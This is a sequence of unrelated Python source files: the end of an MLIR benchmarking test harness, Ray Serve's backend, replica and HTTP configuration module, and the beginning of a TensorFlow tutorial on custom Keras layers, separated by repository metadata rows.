    self.data.reset_index(drop=True, inplace=True)
    self.data.to_json(file_name)

  def dump_raw_to_file(self, file_name: str):
    """Dump the measurements to a raw file by appending."""
    all_data = None
    value_column_names = [
        'runtime_problem_sizes_dict',
        'total_gbytes',
        'total_gflops',
        'elapsed_s_per_iter',
        'gbyte_per_s_per_iter',
        'gflop_per_s_per_iter',
    ]
    # Filter the slowest to isolate the compulsory miss effects.
    # Drop the first index matching every key_value (i.e. the first measurement)
    self.data = self.data.iloc[1:, :]
    if os.path.exists(file_name):
      all_data = pandas.read_json(file_name)
      all_data = pandas.concat(
          [all_data, self.data[['function_name', *value_column_names]]])
    else:
      all_data = self.data[['function_name', *value_column_names]]
    all_data.to_json(file_name, orient='records')

  def _stringify_types(self, value: Sequence[np.dtype]) -> str:
    # NOTE: lstrip/rstrip strip character *sets*; this happens to work for
    # numpy scalar type reprs such as "<class 'numpy.float32'>" -> "float32".
    return ",".join(
        [repr(dt).lstrip("<class 'numpy.").rstrip("'>") for dt in value])

  def _stringify_set(self, value: AbstractSet[str]) -> str:
    return ",".join([k for k in value]) if value else "[]"

  def _stringify_dict(self, value: Mapping[str, ProblemSizes]) -> str:
    return ",".join([str.format(f"{k}={v}") for k, v in value.items()])
def timed_invoke(run_for_n_iters: Callable, gflop_count: float,
                 gbyte_count: float, n_iters: int) -> TimingResults:
  """Run the benchmark, print a quantile table, and return per-iteration metrics.

  `run_for_n_iters(n_iters)` must return per-iteration elapsed times in
  nanoseconds; `gflop_count`/`gbyte_count` are per-iteration totals.
  """
  elapsed_ns = run_for_n_iters(n_iters)
  # Convert to seconds, sorted from slowest to fastest.
  elapsed_s_per_iter = [sec for sec in np.flip(np.sort(elapsed_ns / 1.e9))]
  # AVX512 throttling needs a lot of iteration, chance to only report the last n
  # after throttling has had a good chance of happening.
  elapsed_s_per_iter = keep_last_n_if_specified(elapsed_s_per_iter)
  n_iters = len(elapsed_s_per_iter)
  gbyte_per_s_per_iter = [(gbyte_count / sec) for sec in elapsed_s_per_iter]
  gflop_per_s_per_iter = [(gflop_count / sec) for sec in elapsed_s_per_iter]
  print(f'xxxxxxxxxx : {n_iters} iters time on {1} threads')
  line = '-' * 120
  header_data = \
      ['slowest', 'p1', 'p10', 'p25', 'p50', 'p75', 'p90', 'p99', 'fastest']
  # Rows: header, elapsed seconds, GFlops/s, GBs/s -- each with a unit label.
  data = [
      header_data + ['unit'],
      compute_quantiles(elapsed_s_per_iter) + ['seconds'],
      compute_quantiles(gflop_per_s_per_iter) + ['GFlops/s'],
      compute_quantiles(gbyte_per_s_per_iter) + ['GBs/s']
  ]
  print(line)
  format_str = '{:>12s}' * len(data[0])
  print(format_str.format(*data[0]))
  print(line)
  # Seconds are printed in scientific notation, rates in fixed-point.
  format_str = '{:>12.1e}' * (len(data[0]) - 1) + '{:>12s}'
  print(format_str.format(*data[1]))
  for i in range(2, len(data)):
    format_str = '{:>12.2f}' * (len(data[0]) - 1) + '{:>12s}'
    print(format_str.format(*data[i]))
  return {
      "elapsed_s_per_iter": elapsed_s_per_iter,
      "gbyte_per_s_per_iter": gbyte_per_s_per_iter,
      "gflop_per_s_per_iter": gflop_per_s_per_iter,
  }
# TODO: support more than just RankedTensorType.
def get_mlir_abi_compatible_type(value):
  # Wrap a numpy array in the ranked-memref descriptor expected by the
  # MLIR C ABI.
  return get_ranked_memref_descriptor(value)
# TODO: tighter type than Sequence[Any].
def get_mlir_abi_compatible_types(input_and_outputs: Sequence[Any]):
  """Convert each tensor to a pointer-to-pointer-to-descriptor for the C ABI."""
  # Arguments must be passed as pointers.
  return [
      ctypes.pointer(ctypes.pointer(get_mlir_abi_compatible_type(t)))
      for t in input_and_outputs
  ]
# Return the list of mlir types matching np_types 1-to-1.
def compiled_function_element_types_mlir_builder(
    np_types: Sequence[np.dtype]) -> List[Type]:
  """Map each numpy dtype to its corresponding MLIR element type."""
  return [np_type_to_mlir_type(t) for t in np_types]
def emit_schedule_dialect(module: ModuleOp, transformations: TransformationList):
  """Emit a linalg_transform.sequence op into `module` containing the
  transform IR produced by each transformation, in order."""
  with InsertionPoint(module.body):
    sequence = tx.SequenceOp()
    with InsertionPoint(sequence.body.blocks[0]):
      for t in transformations.transforms:
        t.build_transform_ir()
class ProblemInstance:
  """Builds one problem definition into MLIR, JIT-compiles it, and runs it."""

  problem_definition: ProblemDefinition

  # Helpers for both compile-time and runtime.
  np_types: Sequence[np.dtype]

  # Information about the problem to enable compilation.
  compile_time_problem_sizes_dict: dict

  # Result of compilation.
  mlir_context: Any  # TODO: better type
  mlir_module: Any  # TODO: better type
  mlir_execution_engine: Any  # TODO: better type

  def __init__(self, problem_definition: ProblemDefinition,
               np_types: Sequence[np.dtype]):
    self.problem_definition = problem_definition
    # Helpers for both compile-time and runtime.
    self.np_types = np_types
    # Information about the problem to enable compilation.
    self.compile_time_problem_sizes_dict = None
    # Result of compilation.
    self.mlir_context = None
    self.mlir_module = None
    self.mlir_execution_engine = None

  def __assert_matching_mapping_keys(self, mapping: Mapping[str, Any]):
    # Only validate when the problem definition declares its dimension keys.
    if not hasattr(self.problem_definition, 'keys'):
      return
    assert_dict_entries_match_keys(mapping, self.problem_definition.keys)

  def build_problem_under_context_manager(self,
                                          entry_point_name: str,
                                          fun_to_benchmark_name: str,
                                          module,
                                          zero_at_each_iteration: bool = False):
    """Emit the benchmarked function and its timing wrapper into `module`.

    Must be called under an MLIR Context/Location context manager.
    """
    ctx = module.context
    register_sandbox_passes_and_dialects(ctx)
    with InsertionPoint(module.body):
      types = self.problem_definition.types_mlir_builder(
          self.compile_time_problem_sizes_dict,
          compiled_function_element_types_mlir_builder(self.np_types))
      func = self.problem_definition.build_problem_under_context_manager(
          fun_to_benchmark_name, types, zero_at_each_iteration)
      wrapper = emit_benchmarking_function(entry_point_name, func)

  # Must be called under ContextManager with Context() and Location()
  def _compile_to_execution_engine(
      self,
      module,
      # TODO: Better type than Callable.
      transform: Callable[[ModuleOp], None],
      dump_ir_to_file: str = ''):
    """Lower `module` via `transform`, JIT it, and optionally dump the IR."""
    transformed_module, self.mlir_execution_engine = compile_to_execution_engine(
        module, transform)
    if (len(dump_ir_to_file) > 0):
      f = open(dump_ir_to_file, 'w')
      f.write(str(transformed_module))
      f.close()
    return transformed_module, self.mlir_execution_engine

  def compile_with_schedule_builder(
      self,
      entry_point_name: str,
      fun_to_benchmark_name: str,
      compile_time_problem_sizes_dict: dict,
      # TODO: Better type than Callable.
      schedule_builder: Callable,
      dump_ir_to_file: str = '',
      zero_at_each_iteration: bool = False):
    """Build the problem, let `schedule_builder` add transform IR, and compile
    by applying that schedule."""
    with ir.Context() as ctx, ir.Location.unknown() as loc:
      self.mlir_module = Module.create()
      self.compile_time_problem_sizes_dict = compile_time_problem_sizes_dict
      self.build_problem_under_context_manager(entry_point_name,
                                               fun_to_benchmark_name,
                                               self.mlir_module)
      # TODO: this is necessary to force-load the dialect, otherwise op creation
      # complains about "unregistered dialect" despite the registration call just
      # above.
      ctx.dialects["linalg_transform"]
      schedule_builder(self.mlir_module)
      return self._compile_to_execution_engine(self.mlir_module,
                                               ApplySchedule(),
                                               dump_ir_to_file=dump_ir_to_file)

  def compile(
      self,
      entry_point_name: str,
      fun_to_benchmark_name: str,
      compile_time_problem_sizes_dict: dict,
      # TODO: Better type than Callable.
      transform: Callable,
      dump_ir_to_file: str = '',
      zero_at_each_iteration: bool = False):
    """Compile the problem with `transform`. A ProblemInstance may only be
    compiled once; instantiate a new one to recompile."""
    assert self.compile_time_problem_sizes_dict is None, \
        f'Problem already compiled, please instantiate a new problem'
    self.__assert_matching_mapping_keys(compile_time_problem_sizes_dict)
    self.compile_time_problem_sizes_dict = compile_time_problem_sizes_dict
    with Context() as ctx, Location.unknown() as loc:
      self.mlir_context = ctx
      self.mlir_module = Module.create()
      self.build_problem_under_context_manager(entry_point_name,
                                               fun_to_benchmark_name,
                                               self.mlir_module,
                                               zero_at_each_iteration)

      # Close over the entry point name so the transform can target it.
      def apply_transform_to_entry_point_name(module):
        return transform(entry_point_name, module)

      self._compile_to_execution_engine(self.mlir_module,
                                        apply_transform_to_entry_point_name,
                                        dump_ir_to_file)

  def run(self,
          n_iters: int,
          entry_point_name: str,
          runtime_problem_sizes_dict: dict,
          dump_obj_to_file: str = None,
          skip_setup_and_dump_and_check: bool = False):
    """Invoke the compiled entry point `n_iters` times and return timing
    metrics (see `timed_invoke`)."""
    self.__assert_matching_mapping_keys(runtime_problem_sizes_dict)
    assert_runtime_sizes_compatible_with_compile_time_sizes(
        runtime_problem_sizes_dict, self.compile_time_problem_sizes_dict)
    # 1. Setup NP inputs and outputs
    np_input_and_outputs = self.problem_definition.tensors_np_builder(
        runtime_problem_sizes_dict, self.np_types)
    # np_input_and_outputs needs to remain live as long as
    # np_input_and_outputs_pointers is used
    np_input_and_outputs_pointers = get_mlir_abi_compatible_types(
        np_input_and_outputs)

    # 2. Setup function to run, taking a np array of int64.
    def run_for_n_iters(n_iters: int):
      np_timers = np.zeros([n_iters], dtype=np.int64)
      np_timers_pointer = get_mlir_abi_compatible_types([np_timers]).pop()
      self.mlir_execution_engine.invoke(entry_point_name,
                                        *np_input_and_outputs_pointers,
                                        np_timers_pointer)
      return np_timers

    if not skip_setup_and_dump_and_check:
      # 3. Pre-run to ensure JIT compilation actually happened to the end.
      run_for_n_iters(1)

      # 4. Now dump to obj file as the JIT compilation actually happened.
      if (dump_obj_to_file is not None and len(dump_obj_to_file) > 0):
        self.mlir_execution_engine.dump_to_object_file(dump_obj_to_file)

      # 5. Check.
      # TODO: this checks seems to be always true as `check_np` is a function
      # defined to be just `pass` at the base class level, nobody overrides it as
      # attribute to be None.
      if self.problem_definition.check_np is not None:
        self.problem_definition.check_np(*np_input_and_outputs)

    # 5. Showtime.
    return timed_invoke(run_for_n_iters=run_for_n_iters,
                        gflop_count=self.problem_definition.gflop_count_builder(
                            runtime_problem_sizes_dict),
                        gbyte_count=self.problem_definition.gbyte_count_builder(
                            runtime_problem_sizes_dict, self.np_types),
                        n_iters=n_iters)
def _pytimed(callback: Callable[..., None], *args: Any, **kwargs: Any):
"""Call the given callback and return time in nanoseconds as result."""
start_time = time.monotonic_ns()
results = callback(*args, **kwargs)
end_time = time.monotonic_ns()
duration = (end_time - start_time)
return duration
def _run_benchmark_n_iters(callback: Callable[[int], None], n_iters: int,
*args: Any):
"""Call the given callback `n_iters` times and return the times as a 1-d array."""
return np.asarray([_pytimed(callback, *args) for _ in range(n_iters)])
def _parse_problem_sizes(argument: str) -> Sequence[Union[int, Sequence[int]]]:
"""Parse a problem size argument into a possibly nested integer sequence.
Examples:
64,128 -> [64, 128]
32,32,[1,1] -> [32, 32, [1, 1]]
"""
problem_sizes = []
while argument:
# Match size.
match = re.match(r"""[,]?\d+""", argument)
if match:
problem_sizes.append(int(match.group().lstrip(',')))
argument = argument[match.end():]
continue
# Match nested sizes.
match = re.match(r"""[,]?\[[0-9,]+\]""", argument)
if match:
nested = match.group().lstrip(',')[1:-1]
problem_sizes.append([int(elem) for elem in nested.split(',')])
argument = argument[match.end():]
continue
raise ValueError()
return problem_sizes
def _parse_dimension_list(argument: str) -> Sequence[str]:
"""Parse a sequence of dimensions or the empty list.
Examples:
k,m -> ['k', 'm']
[] -> []
"""
if argument == '[]':
return []
return argument.split(',')
def add_argparser_arguments(
    parser: argparse.ArgumentParser, \
    default_problem_sizes_list: Sequence[Sequence[int]],
    benchmark_name: str = 'Benchmark',
    default_n_iters: int = 100,
    default_expert_list: Sequence[str] = '',
    default_dynamic_at_compile_time_list: Sequence[
        Sequence[str]] = [],
    default_spec_list: Sequence[str] = []) -> argparse.Namespace:
  """Add the common benchmark command-line flags to `parser`.

  Arguments:
  parser: Parser to which the arguments are added (mutated in place).
  default_problem_sizes_list: Default problem sizes.
  benchmark_name: Benchmark name. NOTE(review): currently unused here -- it is
    consumed by `test_argparser`, which creates the parser description.
  default_n_iters: Default number of iterations.
  default_expert_list: Default experts.
  default_dynamic_at_compile_time_list: Default dynamic at compile time dimensions.
  default_spec_list: Default specification list.
  """
  parser.add_argument('--n_iters',
                      '-i',
                      type=int,
                      nargs='?',
                      help='number of iterations (e.g., -i 100)',
                      default=default_n_iters)
  parser.add_argument('--problem_sizes_list',
                      '-p',
                      type=_parse_problem_sizes,
                      nargs='+',
                      help='problem sizes (e.g., -p 32,32,64 8,8,8)',
                      default=default_problem_sizes_list)
  parser.add_argument('--expert_list',
                      '-e',
                      type=str,
                      nargs='+',
                      help='experts (e.g., -e Expert1 Expert2)',
                      default=default_expert_list)
  parser.add_argument(
      '--dynamic_at_compile_time_list',
      '-r',
      type=_parse_dimension_list,
      nargs='+',
      help='dynamic at compile time dimensions (e.g., -r k,m k [])',
      default=default_dynamic_at_compile_time_list)
  parser.add_argument('--spec_list',
                      '-s',
                      type=str,
                      nargs='+',
                      help='problem specifications (e.g., -s mk,kn km,kn)',
                      default=default_spec_list)
  parser.add_argument('--dump_data',
                      type=str,
                      nargs='?',
                      help='dump file (e.g., --dump_data /tmp/data.json)',
                      default='')
def test_argparser(benchmark_name: str, \
                   default_n_iters: int,
                   default_problem_sizes_list: Sequence[Sequence[int]],
                   default_expert_list: Sequence[str],
                   default_dynamic_at_compile_time_list: Sequence[Sequence[str]],
                   default_spec_list: Sequence[str]) -> argparse.Namespace:
  """Test argument parser.

  Creates an argument parser and returns the parsed arguments.

  Arguments:
  benchmark_name: Benchmark name.
  default_n_iters: Default number of iterations.
  default_problem_sizes_list: Default problem sizes.
  default_expert_list: Default experts.
  default_dynamic_at_compile_time_list: Default dynamic at compile time dimensions.
  default_spec_list: Default specification list.
  """
  parser = argparse.ArgumentParser(description=benchmark_name)
  add_argparser_arguments(
      parser=parser,
      benchmark_name=benchmark_name,
      default_n_iters=default_n_iters,
      default_problem_sizes_list=default_problem_sizes_list,
      default_expert_list=default_expert_list,
      default_dynamic_at_compile_time_list=default_dynamic_at_compile_time_list,
      default_spec_list=default_spec_list)
  # Parse the process' actual command line, skipping argv[0].
  return parser.parse_args(sys.argv[1:])
def test_sizes(dim_names: Sequence[str],
problem_sizes: ProblemSizes) -> dict[str, ProblemSizes]:
"""Annotate the problem size arguments with the given dimension names."""
return [{k: v for k, v in zip(dim_names, sizes)} for sizes in problem_sizes]
def test_experts(
all_experts: Sequence[TransformationList],
all_names: Sequence[str] = [],
expert_list: Sequence[str] = []) -> dict[str, TransformationList]:
"""Annotate the expert name and remove the experts not in expert list."""
assert len(all_experts) == len(all_names), "Expect one name per expert."
return {
k: v
for k, v in zip(all_names, all_experts)
if not expert_list or k in expert_list
}
def test_harness(problem_factory: Callable[
    [Mapping[str, Any], Sequence[np.dtype]], ProblemDefinition],
                 np_types_list: Sequence[Sequence[np.dtype]],
                 problem_sizes_list: Sequence[Mapping[str, Any]],
                 experts: Union[Sequence[TransformationList],
                                Mapping[str, TransformationList]],
                 n_iters: int = 1,
                 function_name: str = 'tested_function',
                 dynamic_at_compile_time_sizes: AbstractSet[str] = set(),
                 **kwargs) -> Measurements:
  """Test runner facility.

  Compiles and runs a test or a benchmark for a cross-product of possible
  argument types, problem sizes and compilation experts. Collects and prints
  the results to the standard output.

  Arguments:
  problem_factory: A callable to construct a ProblemDefinition given the size
    mapping and the argument type choice. May be called multiple times.
  np_type_list: A list of elemental type lists to try (each inner list must
    have as many entries as the problem has arguments).
  problem_sizes_list: A list of size mappings to try.
  experts: A sequence or dictionary of compilation experts to try.
  n_iters: Number of times to run the test.
  function_name: Name of the function in which the IR is emitted, this name
    can be used by compilation experts to target the transformation.
  dynamic_at_compile_time_sizes: A set of size keys that should be treated as
    unknown (-1) at compilation time and only set at runtime.

  Keyword arguments:
  numpy_benchmark: A callable accepting a list of NumPy tensors, the current
    size mapping and the type selection that performs the computation using
    Numpy. If the `BENCHMARK_NUMPY` environment variable is set and the
    argument is provided, it will be called `n_iters` times for the purpose
    of measuring baseline performance.
  pytorch_benchmark: A callable accepting a list of PyTorch tensors, the
    current size mapping and the type selection that performs the computation
    using PyTorch. If the `BENCHMARK_TORCH` environment variable is set and
    the argument is provided, it will be called `n_iters` times for the
    purpose of measuring baseline performance.
  plot_path: A path to an existing directory to dump the performance plots.
  backends: List of backends (containing 'strategy' or 'dialect', or both) to
    use for compilation.

  Returns: A dictionary of all collected benchmark results.
  """
  # Generate expert names if none are provided.
  if isinstance(experts, Sequence):
    experts = {str(value): value for value in experts}

  measurements = Measurements()

  # Validate the requested backends before doing any expensive work.
  backends = kwargs.get("backends", ['strategy'])
  for b in backends:
    assert b in ('strategy', 'dialect'), "Unknown backend: " + str(b)

  for np_types in np_types_list:
    for problem_sizes_dict in problem_sizes_list:
      # Sizes listed in `dynamic_at_compile_time_sizes` are erased to -1 for
      # compilation; the concrete values are still supplied at runtime.
      compile_time_problem_sizes_dict = {
          key: (value if key not in dynamic_at_compile_time_sizes else -1)
          for key, value in problem_sizes_dict.items()
      }
      runtime_problem_sizes_dict = problem_sizes_dict

      # Init printing.
      print(
          f'\n###############################################################\n'
          f'Compile-time problem size {compile_time_problem_sizes_dict}\n'
          f'Runtime problem size {runtime_problem_sizes_dict}\n'
          f'Problem types {np_types}')

      problem_definition = problem_factory(problem_sizes_dict, np_types)
      gflops = problem_definition.gflop_count_builder(problem_sizes_dict)
      gbytes = problem_definition.gbyte_count_builder(problem_sizes_dict,
                                                      np_types)

      def run_problem_instance(instance: ProblemInstance, name: str):
        """Run `instance` and record its timings under `name`."""
        timing_results = instance.run(
            n_iters=n_iters,
            entry_point_name='main',
            runtime_problem_sizes_dict=runtime_problem_sizes_dict,
            dump_obj_to_file=kwargs.get('dump_obj_to_file', ''))
        # NOTE(review): `start` is read from the enclosing scope and is set
        # by the caller right before *compilation*, so this "Run time" also
        # includes the compile phase -- TODO confirm this is intended.
        print(f'Run time {time.time() - start}')
        measurements.append(
            function_name,
            name,
            np_types,
            dynamic_at_compile_time_sizes,
            runtime_problem_sizes_dict,
            gflops,
            gbytes,
            timing_results,
        )

      for expert_name, expert in experts.items():
        print(f'\nCompilation expert {expert_name}')

        # Compile and run once per requested backend.
        if 'dialect' in backends:
          print("xxxxxxxxxx: Dialect:")
          problem_tx = ProblemInstance(problem_definition, np_types)
          start = time.time()
          problem_tx.compile_with_schedule_builder(
              entry_point_name='main',
              fun_to_benchmark_name=function_name,
              compile_time_problem_sizes_dict=compile_time_problem_sizes_dict,
              schedule_builder=lambda m: emit_schedule_dialect(m, expert),
              dump_ir_to_file=kwargs.get('dump_tx_ir_to_file', ''),
              zero_at_each_iteration=kwargs.get('zero_at_each_iteration',
                                                False))
          print(f'Compile time {time.time() - start}')
          run_problem_instance(problem_tx, expert_name + '_dialect')

        if 'strategy' in backends:
          print("xxxxxxxxxx: Strategy:")
          problem = ProblemInstance(problem_definition, np_types)
          start = time.time()
          problem.compile(
              entry_point_name='main',
              fun_to_benchmark_name=function_name,
              compile_time_problem_sizes_dict=compile_time_problem_sizes_dict,
              transform=expert,
              dump_ir_to_file=kwargs.get('dump_ir_to_file', ''),
              zero_at_each_iteration=kwargs.get('zero_at_each_iteration',
                                                False))
          print(f'Compile time {time.time() - start}')
          run_problem_instance(problem, expert_name + "_strategy")

      # Optional baseline measurements; both are gated on an environment
      # variable *and* the corresponding callable being supplied.
      if 'numpy_benchmark' in kwargs and os.environ.get('BENCHMARK_NUMPY'):
        print('\nNumPy reference\n')
        args = problem_definition.tensors_np_builder(problem_sizes_dict,
                                                     np_types)
        timing_results = timed_invoke(
            lambda n: _run_benchmark_n_iters(kwargs['numpy_benchmark'], n,
                                             args, problem_sizes_dict,
                                             np_types),
            gflops, gbytes, n_iters)
        measurements.append(function_name, 'numpy', np_types,
                            dynamic_at_compile_time_sizes,
                            runtime_problem_sizes_dict, gflops, gbytes,
                            timing_results)

      if 'pytorch_benchmark' in kwargs and os.environ.get('BENCHMARK_TORCH'):
        print('\nPyTorch reference\n')
        import torch
        # Single-threaded torch for a comparable baseline.
        torch.set_num_threads(1)
        numpy_args = problem_definition.tensors_np_builder(
            problem_sizes_dict, np_types)
        args = list(map(torch.from_numpy, numpy_args))
        timing_results = timed_invoke(
            lambda n: _run_benchmark_n_iters(kwargs[
                'pytorch_benchmark'], n, args, problem_sizes_dict, np_types),
            gflops, gbytes, n_iters)
        measurements.append(function_name, 'pytorch', np_types,
                            dynamic_at_compile_time_sizes,
                            runtime_problem_sizes_dict, gflops, gbytes,
                            timing_results)

  # Optionally dump the raw measurements to a file.
  file_name = kwargs.get('dump_data_to_file', '')
  if file_name != '':
    # measurements.dump_to_file(file_name)
    measurements.dump_raw_to_file(file_name)
  return measurements
| 39.920567 | 90 | 0.663267 |
a73da5149cabf96aace7a0cad57ae4f64e6425bb | 6,633 | py | Python | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 1 | 2021-09-14T15:14:05.000Z | 2021-09-14T15:14:05.000Z | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 66 | 2021-02-23T19:49:27.000Z | 2022-03-05T08:04:38.000Z | python/ray/serve/config.py | jenhaoyang/ray | b6f593b53e5b9f012261794fd9bff58c32e54f57 | [
"Apache-2.0"
] | 1 | 2020-01-16T20:52:25.000Z | 2020-01-16T20:52:25.000Z | import inspect
from enum import Enum
from typing import Any, List, Optional
import pydantic
from pydantic import BaseModel, PositiveInt, validator, NonNegativeFloat
from ray.serve.constants import DEFAULT_HTTP_HOST, DEFAULT_HTTP_PORT
class BackendConfig(BaseModel):
    """Configuration options for a backend, to be set by the user.

    Args:
        num_replicas (Optional[int]): The number of processes to start up that
            will handle requests to this backend. Defaults to 1.
        max_concurrent_queries (Optional[int]): The maximum number of queries
            that will be sent to a replica of this backend without receiving a
            response. Defaults to 100.
        user_config (Optional[Any]): Arguments to pass to the reconfigure
            method of the backend. The reconfigure method is called if
            user_config is not None.
        experimental_graceful_shutdown_wait_loop_s (Optional[float]): Duration
            that backend workers will wait until there is no more work to be
            done before shutting down. Defaults to 2s.
        experimental_graceful_shutdown_timeout_s (Optional[float]):
            Controller waits for this duration to forcefully kill the replica
            for shutdown. Defaults to 20s.
    """

    num_replicas: PositiveInt = 1
    max_concurrent_queries: Optional[int] = None
    user_config: Any = None
    experimental_graceful_shutdown_wait_loop_s: NonNegativeFloat = 2.0
    experimental_graceful_shutdown_timeout_s: NonNegativeFloat = 20.0

    class Config:
        validate_assignment = True
        extra = "forbid"
        arbitrary_types_allowed = True

    # Dynamic default for max_concurrent_queries: None means "use 100".
    @validator("max_concurrent_queries", always=True)
    def set_max_queries_by_mode(cls, v, values):  # noqa 805
        if v is None:
            v = 100
        else:
            if v <= 0:
                # Fixed error message: values <= 0 are rejected, so the
                # requirement is strictly positive (was "must be >= 0").
                raise ValueError("max_concurrent_queries must be > 0")
        return v
class ReplicaConfig:
    """Configuration of the actor replicas that back a backend.

    Validates the backend definition and the Ray actor options, and computes
    the per-replica resource requirements in ``resource_dict``.
    """

    def __init__(self, backend_def, *init_args, ray_actor_options=None):
        """Initialize and validate the replica configuration.

        Args:
            backend_def: An import path string, a function, or a class
                implementing the backend.
            *init_args: Arguments passed to a class backend's constructor
                (not supported for function backends).
            ray_actor_options: Optional dict of Ray actor options
                (num_cpus, num_gpus, memory, object_store_memory, resources).

        Raises:
            TypeError: If backend_def or an option has the wrong type.
            ValueError: If an option is disallowed or out of range.
        """
        self.backend_def = backend_def
        self.init_args = init_args
        if ray_actor_options is None:
            self.ray_actor_options = {}
        else:
            self.ray_actor_options = ray_actor_options

        self.resource_dict = {}
        self._validate()

    def _validate(self):
        """Validate inputs and populate ``self.resource_dict``."""
        # Validate that backend_def is an import path, function, or class.
        if isinstance(self.backend_def, str):
            pass
        elif inspect.isfunction(self.backend_def):
            if len(self.init_args) != 0:
                raise ValueError(
                    "init_args not supported for function backend.")
        elif not inspect.isclass(self.backend_def):
            raise TypeError(
                "Backend must be a function or class, it is {}.".format(
                    type(self.backend_def)))

        if "placement_group" in self.ray_actor_options:
            raise ValueError("Providing placement_group for backend actors "
                             "is not currently supported.")

        if not isinstance(self.ray_actor_options, dict):
            raise TypeError("ray_actor_options must be a dictionary.")
        # These options are managed by Serve; users may not set them.
        # (Error messages fixed: they previously said "in init_args" even
        # though the keys being checked live in ray_actor_options.)
        elif "lifetime" in self.ray_actor_options:
            raise ValueError(
                "Specifying lifetime in ray_actor_options is not allowed.")
        elif "name" in self.ray_actor_options:
            raise ValueError(
                "Specifying name in ray_actor_options is not allowed.")
        elif "max_restarts" in self.ray_actor_options:
            raise ValueError("Specifying max_restarts in "
                             "ray_actor_options is not allowed.")
        else:
            # Ray defaults to zero CPUs for placement, we default to one here.
            if "num_cpus" not in self.ray_actor_options:
                self.ray_actor_options["num_cpus"] = 1

        num_cpus = self.ray_actor_options["num_cpus"]
        if not isinstance(num_cpus, (int, float)):
            raise TypeError(
                "num_cpus in ray_actor_options must be an int or a float.")
        elif num_cpus < 0:
            raise ValueError("num_cpus in ray_actor_options must be >= 0.")
        self.resource_dict["CPU"] = num_cpus

        num_gpus = self.ray_actor_options.get("num_gpus", 0)
        if not isinstance(num_gpus, (int, float)):
            raise TypeError(
                "num_gpus in ray_actor_options must be an int or a float.")
        elif num_gpus < 0:
            raise ValueError("num_gpus in ray_actor_options must be >= 0.")
        self.resource_dict["GPU"] = num_gpus

        memory = self.ray_actor_options.get("memory", 0)
        if not isinstance(memory, (int, float)):
            raise TypeError(
                "memory in ray_actor_options must be an int or a float.")
        elif memory < 0:
            # Fixed copy-paste error: this message previously said
            # "num_gpus" although the check is on "memory".
            raise ValueError("memory in ray_actor_options must be >= 0.")
        self.resource_dict["memory"] = memory

        object_store_memory = self.ray_actor_options.get(
            "object_store_memory", 0)
        if not isinstance(object_store_memory, (int, float)):
            raise TypeError(
                "object_store_memory in ray_actor_options must be "
                "an int or a float.")
        elif object_store_memory < 0:
            raise ValueError(
                "object_store_memory in ray_actor_options must be >= 0.")
        self.resource_dict["object_store_memory"] = object_store_memory

        custom_resources = self.ray_actor_options.get("resources", {})
        if not isinstance(custom_resources, dict):
            raise TypeError(
                "resources in ray_actor_options must be a dictionary.")
        self.resource_dict.update(custom_resources)
class DeploymentMode(str, Enum):
    """Placement mode for the HTTP server ('NoServer' disables it entirely)."""
    NoServer = "NoServer"
    HeadOnly = "HeadOnly"
    EveryNode = "EveryNode"
class HTTPOptions(pydantic.BaseModel):
    """HTTP server options; documentation inside serve.start for user's
    convenience."""

    host: Optional[str] = DEFAULT_HTTP_HOST
    port: int = DEFAULT_HTTP_PORT
    middlewares: List[Any] = []
    location: Optional[DeploymentMode] = DeploymentMode.HeadOnly
    num_cpus: int = 0

    @validator("location", always=True)
    def location_backfill_no_server(cls, v, values):
        # Force NoServer whenever no host is configured or location is unset.
        if values["host"] is None or v is None:
            return DeploymentMode.NoServer
        return v

    class Config:
        validate_assignment = True
        extra = "forbid"
        arbitrary_types_allowed = True
2d5603070f2aee059cf4cb6eb125961327384e72 | 4,842 | py | Python | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | tf2/tutorial/lab.0402.customization.layers.py | zooliet/tensorflow_exercises | a25fe6ec201c29dd45a959933876626b4c4d2be7 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
# Make local and project-root helpers importable.
sys.path.append('./')
sys.path.append('../../')

from lab_utils import (
    tf, os, np, plt, logger, ap, BooleanAction,
    debug, toc, auto_increment
)

# Command-line options (the trailing '*' in help marks the default).
ap.add_argument('--epochs', type=int, default=10, help='number of epochs: 10*')
ap.add_argument('--batch', type=int, default=64, help='batch size: 64*')
args, extra_args = ap.parse_known_args()
logger.info(args)
# logger.info(extra_args)

if args.all:
    args.step = 0 # forced to 0

if args.debug:
    # Enable tab-completion inside pdb and route debug() to breakpoint().
    import pdb
    import rlcompleter
    pdb.Pdb.complete=rlcompleter.Completer(locals()).complete
    # import code
    # code.interact(local=locals())
    debug = breakpoint

import time

### TOC
if args.step == 0:
    toc(__file__)

args.step = auto_increment(args.step, args.all)
### Step #1 - Layers: common sets of useful operations
if args.step == 1:
    print("\n### Step #1 - Layers: common sets of useful operations")

    # In the tf.keras.layers package, layers are objects. To construct a layer,
    # simply construct the object. Most layers take as a first argument the number
    # of output dimensions / channels.
    layer = tf.keras.layers.Dense(100)

    # The number of input dimensions is often unnecessary, as it can be inferred
    # the first time the layer is used, but it can be provided if you want to
    # specify it manually, which is useful in some complex models.
    layer = tf.keras.layers.Dense(10, input_shape=(None, 5))

    logger.info('To use a layer, simply call it')
    print(layer(tf.zeros([10, 5])), '\n')

    # Layers have many useful methods. For example, you can inspect all variables
    # in a layer using `layer.variables` and trainable variables using
    # `layer.trainable_variables`. In this case a fully-connected layer
    # will have variables for weights and biases.
    logger.info('layer.variables:')
    print(layer.variables, '\n')

    logger.info('The variables are also accessible through nice accessors:')
    print(layer.kernel)
    print(layer.bias)

args.step = auto_increment(args.step, args.all)
### Step #2 - Implementing custom layers
if args.step == 2:
    print("\n### Step #2 - Implementing custom layers")

    class MyDenseLayer(tf.keras.layers.Layer):
        """Minimal custom Dense layer: a single learned kernel, no bias."""
        def __init__(self, num_outputs):
            super(MyDenseLayer, self).__init__()
            self.num_outputs = num_outputs

        def build(self, input_shape):
            # Weight creation is deferred to build() so the input size can
            # be inferred from the first call.
            self.kernel = self.add_weight(
                "kernel",
